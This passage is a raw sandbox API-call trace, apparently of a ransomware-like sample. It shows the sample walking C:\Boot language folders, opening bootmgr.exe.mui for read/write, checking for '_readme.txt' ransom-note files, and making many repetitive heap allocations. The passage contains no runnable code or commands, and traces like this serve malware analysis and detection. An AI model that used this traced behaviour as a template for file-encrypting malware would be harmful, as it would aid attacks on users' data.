lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3430f20, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.150] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.150] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0093.150] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.150] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3430f20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.150] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned=".txt" [0093.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.150] FindNextFileW (in: hFindFile=0x31c75c0, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3430f20, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3430f20, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.150] FindClose (in: hFindFile=0x31c75c0 | out: hFindFile=0x31c75c0) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.151] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.151] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.158] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0093.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.158] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.158] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.158] PathFindFileNameW (pszPath="") returned="" [0093.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.158] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.159] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.159] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.159] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.159] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0093.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.159] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0093.159] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.160] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.160] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.160] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0093.160] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.160] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3457080, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.160] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned=".txt" [0093.160] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3457080, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3457080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3457080, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.160] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.160] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.160] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 